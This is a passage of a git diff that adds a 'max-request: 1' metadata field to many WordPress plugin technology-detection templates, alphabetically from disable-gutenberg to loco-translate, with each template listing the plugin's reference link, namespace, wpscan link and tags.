--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
+    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
+    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 43cb2ab09c..c8acf8c625 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
